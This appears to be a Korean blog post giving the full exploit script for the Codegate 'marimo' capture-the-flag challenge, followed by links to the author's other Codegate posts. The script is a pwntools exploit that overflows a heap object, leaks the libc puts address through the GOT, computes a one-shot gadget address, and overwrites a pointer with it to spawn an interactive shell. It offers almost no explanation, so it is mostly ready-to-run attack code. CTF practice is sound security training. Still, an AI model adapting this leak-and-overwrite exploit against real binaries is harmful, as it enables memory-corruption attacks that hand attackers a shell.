exploit code
from pwn import *
import time
def show_me_the_marimo(name, profile):
r.sendline("show me the marimo")
print r.recvuntil(">>")
r.sendline(name)
print r.recvuntil(">>")
r.sendline(profile)
print r.recvuntil(">>")
def view(select):
r.sendline("V")
print r.recvuntil(">>")
r.sendline(select)
if __name__ == "__main__":
binary = "./marimo"
elf = ELF(binary)
r = process(binary)
#strcmp_got = elf.got['strcmp']
puts_got = elf.got['puts']
print r.recvuntil(">>")
show_me_the_marimo("A"*4, "B"*4)
show_me_the_marimo("C"*4, "D"*4)
time.sleep(3)
payload = "A"*52
payload += p32(0x0)
payload += p64(puts_got)
#payload += p64(strcmp_got)
payload += p64(puts_got)
view("0")
print r.recvuntil(">>")
r.sendline("M")
print r.recvuntil(">>")
r.sendline(payload)
#pause()
print r.recvuntil(">>")
r.sendline("B")
print r.recvuntil(">>")
view("1")
print r.recvuntil("name : ")
libc_puts = u64(r.recv(6).ljust(8, "\x00"))
print r.recvuntil(">>")
log.info("libc_puts = {}".format(hex(libc_puts)))
libc_oneshot = libc_puts - 0x2a47a
log.info("oneshot = {}".format(hex(libc_oneshot)))
r.sendline("M")
print r.recvuntil(">>")
#pause()
r.sendline(p64(libc_oneshot))
#pause()
r.interactive()
'CTF > Codegate' 카테고리의 다른 글
| codegate2019 20000 (0) | 2019.02.07 |
|---|---|
| CodeGate2018 BaskinRobins31 (0) | 2018.07.14 |
| Codegate 2018 RedVelvet writeup (0) | 2018.02.04 |